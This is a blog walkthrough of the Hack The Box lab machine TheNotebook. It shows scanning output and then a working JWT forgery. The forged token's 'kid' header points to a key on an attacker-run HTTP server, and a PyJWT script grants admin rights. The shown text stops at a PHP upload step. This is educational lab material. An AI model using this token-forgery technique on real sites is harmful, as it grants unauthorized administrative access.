<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/07/htb-thenotebook">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/07/htb-thenotebook">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/07/htb-thenotebook">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/07/htb-thenotebook">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB TheNotebook | Davi Cruz</title>
<meta name="description" content="Hello guys!  This week’s machine will be TheNotebook, another medium-rated Linux box from Hack The Box, created by mostwanted002.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB TheNotebook">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/07/htb-thenotebook">


  <meta property="og:description" content="Hello guys!  This week’s machine will be TheNotebook, another medium-rated Linux box from Hack The Box, created by mostwanted002.">



  <meta property="og:image" content="https://i.imgur.com/Arm1Pyr.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB TheNotebook">
  <meta name="twitter:description" content="Hello guys!  This week’s machine will be TheNotebook, another medium-rated Linux box from Hack The Box, created by mostwanted002.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/07/htb-thenotebook">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/Arm1Pyr.png">
  

  



  <meta property="article:published_time" content="2021-07-31T09:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/07/htb-thenotebook">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/en-US"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/en-US">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/en-US/categories/">Categories</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/tag/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/about/">About</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB TheNotebook">
    <meta itemprop="description" content="Hello guys!This week’s machine will be TheNotebook, another medium-rated Linux box from Hack The Box, created by mostwanted002.">
    <meta itemprop="datePublished" content="2021-07-31T09:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/07/htb-thenotebook" class="u-url" itemprop="url">Walktrough: HTB TheNotebook
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-07-31T09:00:00-03:00">July 31, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          13 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/07/htb-thenotebook">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Hello guys!</p>

<p>This week’s machine will be <strong>TheNotebook</strong>, another medium-rated Linux box from <a href="https://www.hackthebox.eu/">Hack The Box</a>, created by <a href="https://app.hackthebox.eu/users/120514">mostwanted002</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups for Hack The Box machines are posted as soon as they’re retired.</p>

<p><img src="https://i.imgur.com/DSrrFJP.png" alt="HTB TheNotebook" class="align-center"></p>

<p>This box was a very interesting one, where I had the opportunity to learn more about JWT Tokens in the path for initial access and then more docker escaping techniques abusing capabilities so I could get root.</p>

<h2 id="enumeration">Enumeration</h2>

<p>As usual, we start with a quick <code class="language-plaintext highlighter-rouge">nmap</code> scan to see which services are published in this box.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.230                                                                                       
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-06-10 15:05 <span class="nt">-03</span>
Stats: 0:00:01 elapsed<span class="p">;</span> 0 hosts completed <span class="o">(</span>0 up<span class="o">)</span>, 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% <span class="k">done
</span>Nmap scan report <span class="k">for </span>10.10.10.230
Host is up <span class="o">(</span>0.072s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf <span class="o">(</span>RSA<span class="o">)</span>
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp    open     http    nginx 1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>11.97 seconds
</code></pre></div></div>

<h3 id="80tcp---http-service">80/TCP - HTTP Service</h3>

<p>Accessing the page, noticed that is a simple HTTP application, which uses the default <a href="https://getbootstrap.com/">Bootstrap</a> and no sign of a CMS like WordPress or other known application.</p>

<p><img src="https://i.imgur.com/kJx4QaU.png" alt="HTB TheNotebook - 80/TCP" class="align-center"></p>

<p>The guessing was confirmed during <code class="language-plaintext highlighter-rouge">whatweb</code> execution, which listed only the two known components, as well as the webserver it is running on which is an <em>Nginx</em>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>whatweb 10.10.10.230
http://10.10.10.230 <span class="o">[</span>200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 <span class="o">(</span>Ubuntu<span class="o">)]</span>, IP[10.10.10.230], Title[The Notebook - Your Note Keeper], nginx[1.14.0]
</code></pre></div></div>

<p>Checking the website with <code class="language-plaintext highlighter-rouge">gobuster</code> found the following application pages but were the same already seen inspecting the source code during initial navigation.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://10.10.10.230 <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-x</span> html,txt,php <span class="nt">-t</span> 50 <span class="nt">-o</span> gobuster.txt
<span class="o">===============================================================</span>
Gobuster v3.1.0
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:                     http://10.10.10.230
<span class="o">[</span>+] Method:                  GET
<span class="o">[</span>+] Threads:                 50
<span class="o">[</span>+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="o">[</span>+] Negative Status codes:   404
<span class="o">[</span>+] User Agent:              gobuster/3.1.0
<span class="o">[</span>+] Extensions:              html,txt,php
<span class="o">[</span>+] Timeout:                 10s
<span class="o">===============================================================</span>
2021/06/10 16:04:30 Starting gobuster <span class="k">in </span>directory enumeration mode
<span class="o">===============================================================</span>
/login                <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 1250]
/register             <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 1422]
/admin                <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 9]
/logout               <span class="o">(</span>Status: 302<span class="o">)</span> <span class="o">[</span>Size: 209] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://10.10.10.230/]

<span class="o">===============================================================</span>
2021/06/10 16:34:27 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>

<p>As I haven’t found anything specific, decided to poke a little bit with this app, while inspecting the requests using Burp Suite, looking for an opportunity.</p>

<p>Started by creating an account, clicking on the <em>Register</em> link where some basic information was requested as the image below, and resulted in the account creation without any further problem.</p>

<p><img src="https://i.imgur.com/e49Cij7.png" alt="HTB TheNotebook - SignUp" class="align-center"></p>

<p>After being created, was redirected to a logged page where I was able to create some notes but interacting with these resources didn’t seem that they could be exploited, unless the app would be vulnerable by some kind of <strong>SSTI</strong> (Server-Side Template Injection) once these notes are shown in the page.</p>

<p><img src="https://i.imgur.com/hPKhMaT.png" alt="HTB TheNotebook - Logged User" class="align-center"></p>

<p>Inspecting the requests made so far in Burp since the account creation, nothing interesting was found in the request that could be tampered with to grant us a privileged account but his response is interesting. In this response, we receive a <code class="language-plaintext highlighter-rouge">Set-Cookie</code> for an object named <code class="language-plaintext highlighter-rouge">auth</code>, which contained something that resembled a <strong>Token JWT</strong>.</p>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">302</span> <span class="ne">FOUND</span>
<span class="na">Server</span><span class="p">:</span> <span class="s">nginx/1.14.0 (Ubuntu)</span>
<span class="na">Date</span><span class="p">:</span> <span class="s">Thu, 10 Jun 2021 20:46:42 GMT</span>
<span class="na">Content-Type</span><span class="p">:</span> <span class="s">text/html; charset=utf-8</span>
<span class="na">Content-Length</span><span class="p">:</span> <span class="s">209</span>
<span class="na">Location</span><span class="p">:</span> <span class="s">http://10.10.10.230/</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
<span class="na">Set-Cookie</span><span class="p">:</span> <span class="s">auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Impkb2UiLCJlbWFpbCI6Impkb2VAZHVtbXkuY29tIiwiYWRtaW5fY2FwIjowfQ.Ixm8_VYcfY_WAv0L7i27vyOW15dd2UuhhlOrRaSiwVFyge6_JmC2FjUEYHNh_j4xXFjfaeUR7gkifezXjsJwz99U1zpcp0CaOI9-RWXLSTpnZvprcCCyN5seCkJHNx45-Qb5mCjGDGQbrxkrcUuV8tVcdkEpFi90BfXL6XGGxJe-Ms6YiDWK1fhpaGfKXcRyAYUGWoTs62ulrVwV5fKhH978OE17egmvNWpOL0dNpmpdoCTTKYBX1KDyyFMWJvZWkydPCNPPAaqk0pNxSwiWOYzBBErx2EBd58gpZWlBLNf5JnjyoBXdHt4JdHVcpoZsmBsAT_gxRU_uffzwxTNQN9-vrsA7tLzWuyWWt32s_8hGGrauEBSW4aPP5xRbpGclDfw2KPa7qHdVa5SApHHQrDFfpxhU2hFjvjlBtmwfjJbNHb53ZRXmz0SPRLKf6sOpX3Iswld58yBYP9xtIr3eCsdW1boCsDflfjUi9LQqsM3d_PTgGgzBLIXBQXXj82i0CzlwD3rYl3AjR7IBgBZNee5HJVdNUPYx6e_uG7WU94LUBy7WsfPfYY8VHjbuWVY1Nq3Wqhg2Sb04XmWBbtbV5C12YOu-oA7A6KrloeGOjLHkIlTsnLAj3eNhl_eo5aiLuQL3P5HrGr0K_rrniLHTCGTWX3KM4qgtI57IsbXN0Dw; Path=/</span>
<span class="na">Set-Cookie</span><span class="p">:</span> <span class="s">uuid=796e6cc3-aa50-4f87-b74f-408146886c66; Path=/</span>

<span class="cp">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"&gt;</span>
<span class="nt">&lt;title&gt;</span>Redirecting...<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;h1&gt;</span>Redirecting...<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;p&gt;</span>You should be redirected automatically to target URL: <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/"</span><span class="nt">&gt;</span>/<span class="nt">&lt;/a&gt;</span>.  If not click the link.
</code></pre></div></div>

<p>Checking its content at <a href="https://jwt.ms/">jwt.ms</a>, noticed some details that could allow us to elevate our privileges:</p>

<ul>
  <li>
<code class="language-plaintext highlighter-rouge">kid</code> header, which defines the private key location in an HTTP Server running locally in the application server, is used to sign and evaluate the issued token.</li>
  <li>
<code class="language-plaintext highlighter-rouge">admin_cap</code> payload, which possibly contains a binary or integer that <strong>represents the privilege/role</strong> of the user, that for our recently created account is 0.</li>
</ul>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"typ"</span><span class="p">:</span><span class="w"> </span><span class="s2">"JWT"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"alg"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RS256"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"kid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"http://localhost:7070/privKey.key"</span><span class="w">
</span><span class="p">}</span><span class="err">.</span><span class="p">{</span><span class="w">
  </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"jdoe"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">"jdoe@dummy.com"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"admin_cap"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w">
</span><span class="p">}</span><span class="err">.</span><span class="p">[</span><span class="err">Signature</span><span class="p">]</span><span class="w">
</span></code></pre></div></div>

<p>The fact is: We cannot modify the issued token without signing it again with the key available in the server, but, once the token has a field pointing to the path to the key to which it was signed, we could get a chance to recreate this token, signing it with our own RSA key and <strong>making it available to the backend</strong> during our credential validation, but we can only be sure testing <img class="emoji" title=":stuck_out_tongue_winking_eye:" alt=":stuck_out_tongue_winking_eye:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f61c.png" height="20" width="20">.</p>

<h2 id="initial-access">Initial access</h2>

<p>Once we need to create a token, searching for the easiest way to do it I have found a python library called <a href="https://pyjwt.readthedocs.io/en/stable/">PyJWT</a> that seemed quite easy to be used. In the initial docs page, we have a sample code signing a token but we need to dig further in their documentation to find a way to add the <code class="language-plaintext highlighter-rouge">kid</code> header and create the cert.</p>

<p>Achieved the desired outcome by running the following steps:</p>

<ul>
  <li>Created the RSA key using the command line below. We’ll have as output the content of the public key and, in the specified file, the private key.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl req <span class="nt">-nodes</span> <span class="nt">-new</span> <span class="nt">-x509</span> <span class="nt">-keyout</span> privKey.key <span class="nt">-noout</span> <span class="nt">-pubkey</span>
</code></pre></div></div>

<ul>
  <li>Published the private key using a simple HTTP Server, using the same port web server was using in the observed token.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 <span class="nt">-m</span> http.server 7070
</code></pre></div></div>

<ul>
  <li>
    <p>After creating the key, wrote a script as content below using the obtained values of public and private keys and signed the payload. This script uses examples located at <a href="https://pyjwt.readthedocs.io/en/stable/usage.html">Usage Examples</a> in the official module documentation.</p>

    <ul>
      <li>Necessary to install the module using the command <code class="language-plaintext highlighter-rouge">pip3 install pyjwt</code>. In case <code class="language-plaintext highlighter-rouge">jwt</code> module is already installed, necessary to remove it first, otherwise, the script will fail.</li>
    </ul>
  </li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python3
</span><span class="kn">import</span> <span class="n">jwtprivate_key</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"""</span><span class="s">-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDT/8rR3ZkWJOJN
[...]
XDmj7j8p7kdd2ZM1MYTO6A0=
-----END PRIVATE KEY-----</span><span class="sh">"""</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
    <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">jdoe</span><span class="sh">"</span><span class="p">,</span>
    <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">jdoe@dummy.com</span><span class="sh">"</span><span class="p">,</span>
    <span class="sh">"</span><span class="s">admin_cap</span><span class="sh">"</span><span class="p">:</span> <span class="mi">1</span>
<span class="p">}</span>
<span class="n">header</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">kid</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">http://10.10.10.10:7070/privKey.key</span><span class="sh">"</span><span class="p">}</span>
<span class="n">encoded</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">private_key</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">RS256</span><span class="sh">"</span><span class="p">,</span><span class="n">headers</span><span class="o">=</span><span class="n">header</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">encoded</span><span class="p">)</span>
</code></pre></div></div>

<p>Sample output is pasted below:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 generate-jwt.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4xMTY6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Impkb2UiLCJlbWFpbCI6Impkb2VAZHVtbXkuY29tIiwiYWRtaW5fY2FwIjoxfQ.WMokYjjMMECoF2UWM2fcMVcR99X34dHXwuj8nXqBlQWOnwC1NdBoO6PD-ZHjAZ5p969Jbf4XnRKZedAAokxvIgG2ymYNV1F8CcDzDfuHlMlk_CiYGvimoJWgvA3S-24KDql2bRrvJgoPbKKjqJ5Ir7mWZF1USGSwsttc9Ff1qniFAWTJ8CXkTLtfR498_rY_uIJfBdvqTbi3C9fWJcnSwjCGROkEGxCYve4cf5rjFvm_D_G5-S8oWkXICYAFp5lMQ288E0qGQp04nD16H1v2YzOROolNDeqMVB2uaI060xjKEA8mv6taa095q7rEqzpzXSj21Uq2-xcZonk0LI1-yg
</code></pre></div></div>

<p>The generated token, according to jwt.ms, generated the payload below:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"typ"</span><span class="p">:</span><span class="w"> </span><span class="s2">"JWT"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"alg"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RS256"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"kid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"http://10.10.10.10:7070/privKey.key"</span><span class="w">
</span><span class="p">}</span><span class="err">.</span><span class="p">{</span><span class="w">
    </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"jdoe"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">"jdoe@dummy.com"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"admin_cap"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w">
</span><span class="p">}</span><span class="err">.</span><span class="p">[</span><span class="err">Signature</span><span class="p">]</span><span class="w">
</span></code></pre></div></div>

<ul>
  <li>As everything went as expected, is now time to change the cookie value in the browser and <strong><img class="emoji" title=":boom:" alt=":boom:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f4a5.png" height="20" width="20"></strong>: a request was received in the python webserver by the backend, and we can now see the <strong>Admin Panel</strong> option while accessing the portal <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20">
</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 <span class="nt">-m</span> http.server 7070Serving HTTP on 0.0.0.0 port 7070 <span class="o">(</span>http://0.0.0.0:7070/<span class="o">)</span> ...10.10.10.230 - - <span class="o">[</span>10/Jun/2021 18:45:24] <span class="s2">"GET /privKey.key HTTP/1.1"</span> 200 -
</code></pre></div></div>

<p><img src="https://i.imgur.com/NrGXJx9.png" alt="HTB TheNotebook - Admin Panel" class="align-center"></p>

<ul>
  <li>Analyzing what we can do next with the permissions we have from an administrator perspective, we can see two options: list existing notes and upload a file.</li>
</ul>

<p><img src="https://i.imgur.com/fSYkzLZ.png" alt="HTB TheNotebook - Admin Options" class="align-center"></p>

<ul>
  <li>Reviewing the content of existing notes, we were able to see all notes in the app, as the table below. Pay attention to the notes from <strong>admin</strong> which mentions an existing backup in the server as well as the <strong>ability to execute PHP files in the server</strong>:</li>
</ul>

<table>
  <thead>
    <tr>
      <th>Title</th>
      <th>Note</th>
      <th>Owner</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Need to fix config</td>
      <td>Have to fix this issue where PHP files are being executed :/. This can be a potential security issue for the server.</td>
      <td>admin</td>
    </tr>
    <tr>
      <td>Backups are scheduled</td>
      <td>Finally! Regular backups are necessary. Thank god it’s all easy on server.</td>
      <td>admin</td>
    </tr>
    <tr>
      <td>The Notebook Quotes</td>
      <td>“I am nothing special, of this I am sure. I am a common man with common thoughts and I’ve led a common life. There are no monuments dedicated to me and my name will soon be forgotten, but I’ve loved another with all my heart and soul, and to me, this has always been enough..” ― Nicholas Sparks, The Notebook “So it’s not gonna be easy. It’s going to be really hard; we’re gonna have to work at this everyday, but I want to do that because I want you. I want all of you, forever, everyday. You and me… everyday.” ― Nicholas Sparks, The Notebook “You can’t live your life for other people. You’ve got to do what’s right for you, even if it hurts some people you love.” ― Nicholas Sparks, The Notebook “You are, and always have been, my dream.” ― Nicholas Sparks, The Notebook “You are my best friend as well as my lover, and I do not know which side of you I enjoy the most. I treasure each side, just as I have treasured our life together.” ― Nicholas Sparks, The Notebook “I love you. I am who I am because of you. You are every reason, every hope, and every dream I’ve ever had, and no matter what happens to us in the future, everyday we are together is the greatest day of my life. I will always be yours. “ ― Nicholas Sparks, The Notebook “We fell in love, despite our differences, and once we did, something rare and beautiful was created. For me, love like that has only happened once, and that’s why every minute we spent together has been seared in my memory. I’ll never forget a single moment of it.” ― Nicholas Sparks, The Notebook</td>
      <td>noah</td>
    </tr>
    <tr>
      <td>Is my data safe?</td>
      <td>I wonder is the admin good enough to trust my data with?</td>
      <td>noah</td>
    </tr>
  </tbody>
</table>

<p>Once we could possibly upload and run PHP files, decided to make a test, following the steps below:</p>

<ul>
  <li>
    <p>Accessing the <em>File Upload</em> we have a simple page to post our files, where we’re going to inspect the requests using burp.</p>

